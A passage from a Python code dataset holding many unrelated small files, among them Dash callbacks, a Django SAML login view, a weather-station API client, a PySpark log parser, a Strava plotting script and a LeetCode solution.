get_evol_number_atypical_graph(number_atypical_df):\n number_atypical_df['measure_quarter_ts'] = number_atypical_df['measure_quarter'].dt.to_timestamp()\n\n fig = px.scatter(number_atypical_df,\n x='measure_quarter_ts',\n y='number_atypical',\n color='sector_type')\n fig.update_traces(mode='lines+markers')\n fig.update_xaxes(title_text='Quarter', title_font=dict(size=16))\n fig.update_yaxes(title_text='Number of atypical measures',\n title_font=dict(size=16))\n\n return fig\n\n\ndef get_worker_number_atypical_hist(worker_number_atypical_df):\n if worker_number_atypical_df.empty:\n return {}\n\n fig = px.histogram(worker_number_atypical_df, x=\"number_atypical\")\n fig.update_xaxes(title_text='Number of atypical measures',\n title_font=dict(size=16))\n fig.update_yaxes(title_text='Number of workers', title_font=dict(size=16))\n\n return fig\n\n\ndef regiser_callbacks(app):\n @app.callback(\n Output('sectors-ctrl-store-domain', 'data'),\n [Input('sectors-domain-select', 'value')],\n [State('sectors-ctrl-store-domain', 'data')]\n )\n def store_sectors_domain_selected(domain_type, ctrl_data):\n if domain_type is None:\n raise PreventUpdate\n\n if not ctrl_data:\n ctrl_data = {'selected_domain': domain_type}\n else:\n ctrl_data['selected_domain'] = domain_type\n return ctrl_data\n\n # to get back selector value when navigating\n @app.callback(\n Output('sectors-domain-select', 'value'),\n [Input('sectors-ctrl-store-domain', 'modified_timestamp')],\n [State('sectors-ctrl-store-domain', 'data')]\n )\n def set_sectors_domain_selector_value(ts, ctrl_data):\n if ts is None:\n pass\n return ctrl_data['selected_domain']\n\n @app.callback(\n Output('sectors-ctrl-store-statistics', 'data'),\n [Input('sectors-evol-aggreg-radio', 'value'),\n Input('sectors-evol-scope-radio', 'value')],\n [State('sectors-ctrl-store-statistics', 'data')]\n )\n def store_sectors_ctrl_statistics_state(aggreg_method, data_scope, 
data):\n\n if not data:\n data = {'evol_aggreg_ctrl': aggreg_method,\n 'evol_scope_ctrl': data_scope}\n else:\n data['evol_aggreg_ctrl'] = aggreg_method\n data['evol_scope_ctrl'] = data_scope\n return data\n\n @app.callback(\n Output('sectors-ctrl-store-envelop', 'data'),\n [Input('sectors-envelop-select', 'value'),\n Input('sectors-envelop-level', 'value')],\n [State('sectors-ctrl-store-envelop', 'data')]\n )\n def store_sectors_ctrl_enveloppes_state(envelop_method, envelop_level, data):\n\n if not data:\n data = {'envelop_method_ctrl': envelop_method,\n 'envelop_level_ctrl': envelop_level}\n else:\n data['envelop_method_ctrl'] = envelop_method\n data['envelop_level_ctrl'] = envelop_level\n return data\n\n @app.callback(\n [Output('sectors-evol-graph', 'figure'),\n Output('sectors-evol-aggreg-radio', 'value'),\n Output('sectors-evol-scope-radio', 'value')],\n [Input('sectors-evol-gen-button', 'n_clicks'), \n Input('sectors-domain-validate', 'n_clicks')],\n [State('sectors-ctrl-store-statistics', 'data'), \n State('sectors-ctrl-store-domain', 'data')]\n )\n def set_sectors_evol_graphe(n_clicks_evol, n_clicks_domain, ctrl_statistics_data, ctrl_domain_data):\n if n_clicks_evol is None and n_clicks_domain is None:\n # raise PreventUpdate\n pass\n if not ctrl_statistics_data or not ctrl_domain_data:\n return {}, None, None\n else:\n domain_evol_fig = get_domain_evol_graph(\n data_scope=ctrl_statistics_data['evol_scope_ctrl'],\n aggreg_method=ctrl_statistics_data['evol_aggreg_ctrl'],\n domain_type=ctrl_domain_data['selected_domain']\n )\n return domain_evol_fig, ctrl_statistics_data['evol_aggreg_ctrl'], ctrl_statistics_data['evol_scope_ctrl']\n\n @app.callback(\n Output('sectors-selected-worker-table', 'data'),\n [Input('sectors-worker-number-atypical-hist', 'selectedData')],\n [State('sectors-data-store', 'data')]\n )\n def set_selected_worker_table(selected_data, data):\n\n if selected_data is None:\n return None\n\n [x_min, x_max] = selected_data['range']['x']\n workers_data = data['worker_number_atypical']\n\n workers_selected_data = [\n el for el in workers_data if el['number_atypical'] >= x_min and el['number_atypical'] <= x_max]\n\n return workers_selected_data\n\n @app.callback(\n [Output('sectors-envelop-graph', 'figure'),\n Output('sectors-evol-number-atypical-graph', 'figure'),\n Output('sectors-worker-number-atypical-hist', 'figure'),\n Output('sectors-envelop-select', 'value'),\n Output('sectors-envelop-level', 'value'),\n Output('sectors-data-store', 'data')],\n [Input('sectors-envelop-gen-button', 'n_clicks'), \n Input('sectors-domain-validate', 'n_clicks')],\n [State('sectors-ctrl-store-envelop', 'data'),\n State('sectors-ctrl-store-domain', 'data'),\n State('sectors-data-store', 'data')]\n )\n def set_sectors_envelop_graphe(n_clicks_envelop, n_clicks_domain, ctrl_envelop_data, ctrl_domain_data, data):\n if n_clicks_envelop is None and n_clicks_domain is None:\n #raise PreventUpdate\n pass\n if not ctrl_envelop_data:\n # this callback has six outputs, so the early return must supply six values\n return {}, {}, {}, None, None, data\n else:\n\n envelop_df, number_atypical_df, worker_number_atypical_df = get_domain_envelop_dfs(\n envelop_method=ctrl_envelop_data[\"envelop_method_ctrl\"], envelop_level=ctrl_envelop_data[\"envelop_level_ctrl\"], domain_type=ctrl_domain_data['selected_domain'])\n envelop_fig = get_envelop_graph(envelop_df)\n evol_number_atypical_fig = get_evol_number_atypical_graph(\n number_atypical_df)\n worker_number_atypical_fig = get_worker_number_atypical_hist(\n worker_number_atypical_df)\n\n data['worker_number_atypical'] = 
worker_number_atypical_df.to_dict(\n 'records')\n\n return envelop_fig, evol_number_atypical_fig, worker_number_atypical_fig, ctrl_envelop_data['envelop_method_ctrl'], ctrl_envelop_data['envelop_level_ctrl'], data\n\n @app.callback(\n Output('sectors-tab-content', 'children'),\n [Input('sectors-tab', 'active_tab')]\n )\n def switch_sectors_tab(at):\n if at == 'sectors-tab-statistics':\n return statistics_layout\n elif at == 'sectors-tab-enveloppes':\n return enveloppes_layout\n else:\n return html.P(\"Displaying issue ...\")\n","sub_path":"dash-app/modules/sectors/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":9391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"176438764","text":"from django.conf import settings\nfrom django.http import HttpResponse, HttpResponseRedirect, \\\n HttpResponseServerError, HttpResponseBadRequest\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import authenticate, login, logout, REDIRECT_FIELD_NAME\nfrom django.shortcuts import render\n\nfrom onelogin.saml2.auth import OneLogin_Saml2_Auth\nfrom onelogin.saml2.settings import OneLogin_Saml2_Settings\nfrom onelogin.saml2.utils import OneLogin_Saml2_Utils\n\nfrom .utils import SAMLError, SAMLSettingsError, SAMLDataError\nfrom .utils import (get_provider_config,\n init_saml_auth, prepare_django_request)\n\n\n\n\n@csrf_exempt\ndef saml_login(request):\n attributes = None\n req = prepare_django_request(request)\n auth = init_saml_auth(req)\n\n if 'acs' in req['get_data']:\n # IDP initiated\n request_id = None\n\n if 'AuthNRequestID' in request.session:\n request_id = request.session['AuthNRequestID']\n\n auth.process_response(request_id=request_id)\n errors = auth.get_errors()\n\n if not auth.is_authenticated():\n return HttpResponse('Unauthorized', status=401)\n elif not errors:\n if 'AuthNRequestID' in request.session:\n del request.session['AuthNRequestID']\n\n request.session['samlUserdata'] = auth.get_attributes()\n request.session['samlNameId'] = auth.get_nameid()\n request.session['samlSessionIndex'] = auth.get_session_index()\n attributes = request.session['samlUserdata'].items()\n try:\n user = authenticate(request=request)\n except SAMLDataError as e:\n return render(request, 'django_saml2_pro_auth/error.html', {'message': e.args[0]})\n login(request, user)\n if hasattr(settings, 'SAML_REDIRECT'):\n return HttpResponseRedirect(settings.SAML_REDIRECT)\n elif 'RelayState' in req['post_data'] and OneLogin_Saml2_Utils.get_self_url(req) != req['post_data']['RelayState']:\n return HttpResponseRedirect(auth.redirect_to(req['post_data']['RelayState']))\n else:\n return HttpResponseRedirect(OneLogin_Saml2_Utils.get_self_url(req))\n else:\n return HttpResponseBadRequest(\n 'ERRORS FOUND IN SAML REQUEST: %s, REASON: %s' % (\n errors,\n auth.get_last_error_reason()\n )\n )\n elif 'slo' in req['get_data']:\n logout(request)\n return HttpResponseRedirect(auth.logout())\n elif 'sls' in req['get_data']:\n logout(request)\n delete_session_callback = lambda: request.session.clear()\n url = auth.process_slo(delete_session_cb=delete_session_callback)\n errors = auth.get_errors()\n if not errors:\n return HttpResponseRedirect(url)\n else:\n return HttpResponseBadRequest(\n 'ERRORS FOUND IN SAML LOGOUT REQUEST: %s, REASON: %s' % (\n errors,\n auth.get_last_error_reason()\n )\n )\n elif 'provider' in req['get_data']:\n # SP Initiated\n if hasattr(settings, 'SAML_REDIRECT'):\n return 
HttpResponseRedirect(auth.login(return_to=settings.SAML_REDIRECT))\n elif REDIRECT_FIELD_NAME in req['get_data']:\n return HttpResponseRedirect(auth.login(return_to=req['get_data'][REDIRECT_FIELD_NAME]))\n elif 'RelayState' in req['post_data']:\n return HttpResponseRedirect(auth.redirect_to(req['post_data']['RelayState']))\n else:\n redir = OneLogin_Saml2_Utils.get_self_url(req)\n return HttpResponseRedirect(auth.login(return_to=redir))\n else:\n return HttpResponseRedirect(auth.login())\n\ndef metadata(request):\n req = prepare_django_request(request)\n auth = init_saml_auth(req)\n saml_settings = auth.get_settings()\n metadata = saml_settings.get_sp_metadata()\n errors = saml_settings.validate_metadata(metadata)\n\n if len(errors) == 0:\n resp = HttpResponse(content=metadata, content_type='text/xml')\n else:\n resp = HttpResponseServerError(content=', '.join(errors))\n return resp\n","sub_path":"src/django_saml2_pro_auth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"443041318","text":"from tkinter import *\n\nraiz = Tk()\n\nmi_frame=Frame(raiz, width=1200, height=600)#frame dimensions\nmi_frame.pack()#pack the frame \n\ncuadro_nombre=Entry(mi_frame)#create an entry box\ncuadro_nombre.grid(row=0,column=1, padx=10, pady=10)#row 0, column 1, spacing of 10 in X and 10 in Y\ncuadro_nombre.config(fg=\"red\", justify=\"right\")#red text, justified to the right\n\ncuadro_apellido=Entry(mi_frame)\ncuadro_apellido.grid(row=1,column=1, padx=10, pady=10)\n\ncuadro_direccion=Entry(mi_frame)\ncuadro_direccion.grid(row=2,column=1, padx=10, pady=10)\n\nnombre_label=Label(mi_frame, text=\"Nombre: \")\nnombre_label.grid(row=0,column=0,sticky=\"e\", padx=10, pady=10)#sticky=\"e\" anchors the label to the east (see the sticky table in the images)\n\napellido_label=Label(mi_frame, text=\"Apellido: \")\napellido_label.grid(row=1,column=0, sticky=\"e\",padx=10, pady=10)\n\ndireccion_label=Label(mi_frame, text=\"Direccion: \")\ndireccion_label.grid(row=2,column=0, sticky=\"e\", padx=10, pady=10)\n\nraiz.mainloop()#goes last so the window keeps refreshing","sub_path":"cuadro_de_texto.py","file_name":"cuadro_de_texto.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"142538156","text":"\"\"\"\nThis package contains the neural interface and its various concrete implementations\nbased on any existing neural network compatible with Python 3.\n\nThe default one used in Moody is the one that can be found in the sklearn.neural_network\npackage, MLPClassifier.\n\nThe possibility to set a particular net is implemented as a tentative feature but is\nstill not used in the other sections of the architecture.\n\"\"\"\n\n# At the moment only the default one is ready\n\nfrom .default import NeuralInterface, EmptyDatasetError, NeuralCollectingNotStoppedError,\\\n NeuralPredictingNotStoppedError\n\n__all__ = [\"NeuralInterface\",\n \"NeuralCollectingNotStoppedError\",\n \"NeuralPredictingNotStoppedError\",\n \"EmptyDatasetError\"]\n","sub_path":"moodysg/neural/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"637323449","text":"import datetime\nimport time\n\nimport requests\n\nimport settings\n\n\n
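# note: 'settings' is a local module in this project; AmbientAPI further down\n# reads AMBIENT_ENDPOINT, AMBIENT_API_KEY and AMBIENT_APPLICATION_KEY from it\n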
class AmbientWeatherStation:\n \"\"\"\n This class represents a single weather station.\n \"\"\"\n api_instance = None\n mac_address = None\n last_data = {}\n info = {\n 'name': 'Weather Station'\n }\n\n def __init__(self, api_instance, device_dict):\n self.api_instance = api_instance\n self.mac_address = device_dict.get('macAddress', None)\n self.last_data = device_dict.get('lastData', {})\n self.info = device_dict.get('info', {})\n\n def __str__(self):\n\n return '%s@%s' % (self.info.get('name'), self.mac_address)\n\n @staticmethod\n def current_time():\n\n # return the epoch-milliseconds value itself (not a lambda), so it can be\n # passed straight through as the endDate request parameter below\n return int(round(time.time() * 1000))\n\n def get_data(self, **kwargs):\n \"\"\"\n Get the data for a specific device for a specific end date\n\n Keyword Arguments:\n limit - max 288\n end_date - is Epoch in milliseconds\n\n :return:\n \"\"\"\n limit = int(kwargs.get('limit', 288))\n end_date = kwargs.get('end_date', self.current_time())\n\n if self.mac_address is not None:\n service_address = 'devices/%s' % self.mac_address\n\n data = dict(\n limit=limit,\n endDate=end_date\n )\n\n return self.api_instance._api_call(service_address, **data)\n\n\nclass AmbientAPI:\n endpoint = None\n api_key = None\n application_key = None\n client = requests\n\n def __init__(self, **kwargs):\n http_client = kwargs.get('http_client', requests)\n\n self.client = http_client\n self.endpoint = getattr(settings, 'AMBIENT_ENDPOINT', None)\n self.api_key = getattr(settings, 'AMBIENT_API_KEY', None)\n self.application_key = getattr(settings, 'AMBIENT_APPLICATION_KEY', None)\n\n def _api_call(self, service, **kwargs):\n retn = {}\n\n target_url = '%s/%s' % (self.endpoint, service)\n\n params = {\n 'applicationKey': self.application_key,\n 'apiKey': self.api_key\n }\n\n for kwarg_k, kwarg_v in kwargs.items():\n params.update({kwarg_k: kwarg_v})\n\n res = self.client.get(target_url, params, verify=True)\n\n if res.status_code == 200:\n retn = res.json()\n\n return retn\n\n def get_devices(self):\n \"\"\"\n Get all devices\n\n :return:\n A list of AmbientWeatherStation instances.\n \"\"\"\n retn = []\n for device in self._api_call('devices'):\n retn.append(AmbientWeatherStation(self, device))\n\n return retn\n","sub_path":"ambientapi.py","file_name":"ambientapi.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"595040242","text":"import kivy\n\nkivy.require('1.7.2')\n\nfrom kivy.app import App\nfrom kivy.uix.label import Label\nfrom kivy.uix.floatlayout import FloatLayout # FloatLayout lives in kivy.uix.floatlayout, not kivy.uix.gridlayout\nfrom kivy.uix.screenmanager import ScreenManager, Screen\n\n\nclass HomeScreen(FloatLayout):\n def __init__(self, **kwargs):\n super(HomeScreen, self).__init__(**kwargs)\n self.cols = 2 # leftover from a GridLayout version; FloatLayout ignores this attribute\n self.add_widget(Label(text='Hello'))\n\n\nclass MyApp(App):\n title = 'Monopoly'\n\n def build(self):\n return HomeScreen()\n\n\nif __name__ == '__main__':\n MyApp().run()","sub_path":"Kiwi-Excercise/SettingUpTheProjectName.py","file_name":"SettingUpTheProjectName.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"119985664","text":"# -*- coding: utf-8 -*-\nfrom django import forms\nfrom django.forms import widgets\nfrom .models import Feedback, OrderFeedback\n\n\nclass FeedbackForm(forms.ModelForm):\n message = forms.CharField(widget=widgets.Textarea(attrs={'placeholder': u'Ваше сообщение', 'class': 'span9', }))\n\n def __init__(self, *args, **kwargs):\n super(FeedbackForm, self).__init__(*args, **kwargs)\n 
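# the 'spanN' classes below look like Bootstrap 2 grid classes controlling the\n # input width; each placeholder simply mirrors the corresponding field's label\n 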
self.fields['email'].widget.attrs['class'] = 'span4'\n self.fields['name'].widget.attrs['class'] = 'span4'\n self.fields['email'].widget.attrs['placeholder'] = self.fields['email'].label\n self.fields['name'].widget.attrs['placeholder'] = self.fields['name'].label\n\n\n class Meta:\n model = Feedback\n exclude = ('user','position', 'is_active')\n\n\nclass OrderFeedbackForm(forms.ModelForm):\n message = forms.CharField(widget=widgets.Textarea(attrs={'placeholder': u'Ваше сообщение', 'class': 'span5', 'rows':'5',}))\n\n def __init__(self, *args, **kwargs):\n super(OrderFeedbackForm, self).__init__(*args, **kwargs)\n self.fields['contact'].widget.attrs['class'] = 'span5'\n self.fields['name'].widget.attrs['class'] = 'span5'\n self.fields['contact'].widget.attrs['placeholder'] = self.fields['contact'].label\n self.fields['name'].widget.attrs['placeholder'] = self.fields['name'].label\n\n\n class Meta:\n model = OrderFeedback\n exclude = ('user',)\n","sub_path":"apps/feedback/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"257340362","text":"#!/usr/bin/python\r\n\r\n\"\"\"\r\nproblem:\r\nRead and parse the NASA web server log lines,\r\nextract the requesting host, the datetime, the path, and the number of bytes,\r\nthen store the data in a better format.\r\nUse Parquet, a columnar storage format, with Spark SQL.\r\n\"\"\"\r\n\r\nimport sys\r\nimport re\r\nimport datetime\r\n\r\nfrom pyspark import SparkConf, SparkContext\r\nfrom pyspark.sql import SQLContext, Row\r\nfrom pyspark.sql.types import StructType, StructField, StringType, FloatType, TimestampType\r\n\r\nconf = SparkConf().setAppName('nasa log ingest')\r\nsc = SparkContext(conf=conf)\r\nsqlContext = SQLContext(sc)\r\n\r\ndef main(argv=None):\r\n if argv is None:\r\n inputs = sys.argv[1]\r\n outputdir = sys.argv[2]\r\n\r\n # read the input inside main, once the path is known\r\n text = sc.textFile(inputs)\r\n\r\n linere = re.compile(\"^(\\\\S+) - - \\\\[(\\\\S+) [+-]\\\\d+\\\\] \\\"[A-Z]+ (\\\\S+) HTTP/\\\\d\\\\.\\\\d\\\" \\\\d+ (\\\\d+)$\")\r\n\r\n # re.split yields more than one piece only for lines that matched the pattern\r\n request = text.map(lambda line: linere.split(line)).filter(lambda parts: len(parts) > 1).map(\r\n lambda line: Row(hostname=line[1],\r\n timestamp=datetime.datetime.strptime(line[2], '%d/%b/%Y:%H:%M:%S'),\r\n path=line[3], size=float(line[4])))\r\n\r\n schema = StructType([\r\n StructField('hostname', StringType(), False),\r\n StructField('path', StringType(), False),\r\n StructField('size', FloatType(), False),\r\n StructField('timestamp', TimestampType(), False)\r\n ])\r\n\r\n request = sqlContext.createDataFrame(request, schema)\r\n request.write.format('parquet').save(outputdir)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"ingest_logs.py","file_name":"ingest_logs.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"493493118","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 4 20:59:13 2019\n\n@author: eduardo\n\"\"\"\n\nimport random\nimport numpy as np\n\ndef inicializar_album(figus_total):\n album=[]\n i=0\n while i\n#\n\nfrom Packager.CreateArchivePackager import *\nfrom Packager.MacDMGPackager import *\nfrom Packager.MSIFragmentPackager import *\nfrom Packager.NullsoftInstallerPackager import *\nfrom Packager.PortablePackager import *\nfrom Packager.SevenZipPackager import *\nfrom Packager.MultiCollectionPackager import *\n\n\n
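# TypePackager below swaps its own base class at runtime (by rewriting\n# __class__.__bases__), so a single object can delegate to whichever\n# packager backend is configured\n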
class TypePackager(PackagerBase):\n \"\"\"packager that is used in place of various other packagers.\nThe packager that is actually used can be decided at runtime.\n\"\"\"\n\n def __init__(self, defaultType=eval(CraftCore.settings.get(\"Packager\", \"PackageType\", \"NullsoftInstallerPackager\"))):\n CraftCore.log.debug(\"TypePackager __init__ %s\" % defaultType)\n self.__packager = None\n self.changePackager(defaultType)\n\n def changePackager(self, packager=None):\n if packager is not None and (\"Packager\", \"PackageType\") in CraftCore.settings:\n CraftCore.log.debug(\n \"Packager setting %s overridden with %s\" % (packager, CraftCore.settings.get(\"Packager\", \"PackageType\")))\n packager = eval(CraftCore.settings.get(\"Packager\", \"PackageType\"))\n\n if packager is None:\n return\n\n if self.__packager:\n bases = list(self.__class__.__bases__)\n for i in range(len(bases)):\n if bases[i] == self.__packager:\n CraftCore.log.info(f\"Replace Packager: {bases[i]} with {packager}\")\n bases[i] = packager\n self.__class__.__bases__ = tuple(bases)\n else:\n self.__class__.__bases__ += (packager,)\n packager.__init__(self)\n self.__packager = packager\n\n def createPackage(self):\n return self.__packager.createPackage(self)\n","sub_path":"bin/Packager/TypePackager.py","file_name":"TypePackager.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"306529972","text":"class Solution:\n def pathSum(self, root, sum):\n if not root:\n return []\n res = []\n # each stack entry: (node, remaining sum below this node, path so far)\n stack = [(root, sum - root.val, [root.val])]\n while stack:\n curr, val, ls = stack.pop()\n if not curr.left and not curr.right and val == 0:\n res.append(ls)\n # expand curr's children with the updated remaining sum and path\n if curr.left:\n stack.append((curr.left, val - curr.left.val, ls + [curr.left.val]))\n if curr.right:\n stack.append((curr.right, val - curr.right.val, ls + [curr.right.val]))\n return res\n","sub_path":"113/113.path-sum-ii.616030488.Time-Limit-Exceeded.leetcode.python3.py","file_name":"113.path-sum-ii.616030488.Time-Limit-Exceeded.leetcode.python3.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"284277438","text":"# -*- coding: utf-8 -*-\n\"\"\"\nData preprocessing.\nAs noted earlier, data preprocessing takes up about 70% of our time,\nand its quality directly affects the final result.\nFirst we need an overall picture of the data.\n\"\"\"\n# load the relevant modules and libraries\nimport sys\nimport io\nfrom sklearn.preprocessing import Imputer\n# change the default encoding of standard output\nsys.stdout=io.TextIOWrapper(sys.stdout.buffer,encoding='utf8')\nprint(__doc__)\n\nimport pandas as pd\ndata_train = pd.read_csv(\"a8_titanic/data/train.csv\")\n\nprint(\"Column names\", data_train.columns)\n# get a first feel for the data\nprint(\"Per-column properties, nulls and dtypes\", data_train.info())\nprint(data_train[0:10])\ndummies_Cabin = pd.get_dummies(data_train['Cabin'], prefix= 'Cabin')\ndummies_Embarked = pd.get_dummies(data_train['Embarked'], prefix= 'Embarked')\ndummies_Sex = pd.get_dummies(data_train['Sex'], prefix= 'Sex')\ndummies_Pclass = pd.get_dummies(data_train['Pclass'], prefix= 'Pclass')\ndf = pd.concat([data_train, dummies_Cabin, dummies_Embarked, dummies_Sex, dummies_Pclass], axis=1)\nprint(df[0:10])\n# (1) for col\ndf.drop(['Pclass', 'Name', 'Sex', 'Ticket', 'Cabin', 'Embarked'], axis=1, inplace=True)\n# extract the feature columns we need, convert them to numpy format, and model with LogisticRegression from scikit-learn\ntrain_df = df.filter(regex='Survived|Age_.*|SibSp|Parch|Fare_.*|Cabin_.*|Embarked_.*|Sex_.*|Pclass_.*')\nprint(train_df[0:10])\nprint(\"Column names\", train_df.columns)\n# (2) for row\ntest = df[df['Survived'] == 1] # x.sum() computes the sum of each row's columns\n
col_filter\")\nprint(test['Survived'])\n\n","sub_path":"AIE23/20191102_feature_engineering/a8_titanic/feature_test/filter_col_row_outlier.py","file_name":"filter_col_row_outlier.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"541333212","text":"import sys\nfrom importlib import import_module\nfrom pathlib import Path\nfrom typing import Dict\n\nfrom application.henavel.controller.routing.middleware.container import (\n middleware_manager,\n)\nfrom application.henavel.controller.routing.route import (\n RouteController,\n RouteRedirect,\n Route,\n)\nfrom application.settings import ROUTES_DIR\n\n\nclass RouteManager:\n def __init__(self):\n self.container: Dict[str, Route] = {}\n\n def is_registered(self, route: str):\n return route in self.container\n\n def resolve(self, path: str) -> Route:\n if path not in self.container:\n raise RouteNotRegisteredError(f\"a route for '{path}' is not found.\")\n\n route = self.container[path]\n\n route = middleware_manager.wrap(route)\n\n return route\n\n def controller(self, route: str, controller_class):\n self.container[route] = RouteController(controller_class)\n\n def redirect(self, route: str, url: str):\n self.container[route] = RouteRedirect(url)\n\n\nclass RouteNotRegisteredError(Exception):\n pass\n\n\ndef import_routes():\n sys.path.append(ROUTES_DIR)\n route_files = Path(ROUTES_DIR).glob(\"*.py\")\n\n for file in route_files:\n if file.name == \"__init__.py\":\n continue\n\n module_name = file.name.rsplit(\".py\", 1)[0]\n import_module(f\"{module_name}\")\n\n sys.path.pop()\n\n\nroute_manager = RouteManager()\nimport_routes()\n","sub_path":"application/henavel/controller/routing/route_manager.py","file_name":"route_manager.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"4747802","text":"def is_prime(n):\n assert int(n) > 0, \"Num must be positive\"\n if n == 1:\n return False\n i = 2\n while i * i <= n:\n if n % i == 0:\n return False\n i += 1\n return True\n\n\nn = int(input())\nprint(is_prime(n))","sub_path":"primes_tests/root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"330952459","text":"#\r\n# @lc app=leetcode.cn id=1262 lang=python3\r\n#\r\n# [1262] 可被三整除的最大和\r\n#\r\n# https://leetcode-cn.com/problems/greatest-sum-divisible-by-three/description/\r\n#\r\n# algorithms\r\n# Medium (33.74%)\r\n# Likes: 6\r\n# Dislikes: 0\r\n# Total Accepted: 838\r\n# Total Submissions: 2.5K\r\n# Testcase Example: '[3,6,5,1,8]'\r\n#\r\n# 给你一个整数数组 nums,请你找出并返回能被三整除的元素最大和。\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n# 示例 1:\r\n#\r\n# 输入:nums = [3,6,5,1,8]\r\n# 输出:18\r\n# 解释:选出数字 3, 6, 1 和 8,它们的和是 18(可被 3 整除的最大和)。\r\n#\r\n# 示例 2:\r\n#\r\n# 输入:nums = [4]\r\n# 输出:0\r\n# 解释:4 不能被 3 整除,所以无法选出数字,返回 0。\r\n#\r\n#\r\n# 示例 3:\r\n#\r\n# 输入:nums = [1,2,3,4,4]\r\n# 输出:12\r\n# 解释:选出数字 1, 3, 4 以及 4,它们的和是 12(可被 3 整除的最大和)。\r\n#\r\n#\r\n#\r\n#\r\n# 提示:\r\n#\r\n#\r\n# 1 <= nums.length <= 4 * 10^4\r\n# 1 <= nums[i] <= 10^4\r\n#\r\n#\r\n#\r\n\r\n# @lc code=start\r\ntry:\r\n from typing import *\r\n from collections import defaultdict\r\n import heapq\r\nexcept Exception as err:\r\n print('Import failed: ' + str(err))\r\n\r\n\r\nclass Solution:\r\n def maxSumDivThree(self, nums: List[int]) -> int:\r\n # 先判断sm是否能被3整除\r\n # 不能的话则可以减去最小的余数和sm余数相同的数\r\n # 
sm = sum(nums)\r\n if sm % 3 == 0: return sm\r\n cnt = [[], [], []]\r\n for n in nums:\r\n cnt[n % 3].append(n)\r\n INF = float('inf')\r\n for c in cnt:\r\n c.extend([INF, INF])\r\n mod = sm % 3\r\n return max(sm - sum(heapq.nsmallest(1, cnt[mod])),\r\n sm - sum(heapq.nsmallest(2, cnt[3 - mod])))\r\n\r\n\r\n# @lc code=end\r\nif __name__ == '__main__':\r\n print(Solution().maxSumDivThree([1, 2, 3, 4, 4]))\r\n","sub_path":"Medium/1262.可被三整除的最大和.py","file_name":"1262.可被三整除的最大和.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"53024730","text":"# -*- coding: latin1 -*-\n\ndiasVida = int(input('Insira o Numero de dias de Vida: '))\n\nano = int(diasVida / 365)\n\nprint ('%d ano(s)' % ano)\n\nmeses = int((diasVida / 30)) - (ano * 12)\n\nprint ('%d mes(es)' % meses)\n\nif diasVida == 365:\n dia = 0\nelse:\n # integer division so 'dia' is the remainder in whole days\n dia = diasVida - ((diasVida // 30) * 30)\n\nprint ('%d dia(s)' % dia)\n","sub_path":"IdadeDias.py","file_name":"IdadeDias.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"15816278","text":"#!/usr/bin/env/python\n\nimport numpy as np \nimport matplotlib.pyplot as plt \nimport mysql.connector \nimport pandas as pd\nimport pandasql as psql\n#from psql import sqldf \n \n\n'''Loading in the Strava data'''\n\nstravadf_old_headers = pd.read_csv(\n'/Users/gracebreen/Python_files/Strava_Project/export_53215524/activities.csv',\nheader=0,\nusecols=['Activity Date', 'Activity Type', 'Elapsed Time', 'Distance', 'Average Grade', 'Calories'])\n#print(stravadf_old_headers.head(100))\n\n\n'''Changing the names of some columns to remove spaces'''\n\nstravadf = stravadf_old_headers.rename(columns={'Activity Type':'Activity_Type', 'Elapsed Time':'Elapsed_Time', 'Average Grade':'Average_Grade'})\n\n\nselected_df = psql.sqldf(\"select Average_Grade, Distance from stravadf\")\nprint(selected_df.head())\n\nplt.figure()\nplot = stravadf.plot(x=\"Average_Grade\", y=\"Distance\", style='o')\nplot.set_xlabel(\"Average Gradient\")\nplot.set_ylabel(\"Distance, Kilometres\")\nplt.title(\"Distance of Strava Activities versus Average Gradient\")\n# save before showing: plt.show() closes the figure, which would leave the saved PNG blank\nplt.savefig('Distance_versus_AvgGradient.png')\nplt.show()\n","sub_path":"Strava_code.py","file_name":"Strava_code.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"586023289","text":"# Problem: the concrete connector type is only known at runtime, from the file extension.\n# Solution: a factory function maps the extension to the matching connector class.\n# Where to use: loading data files 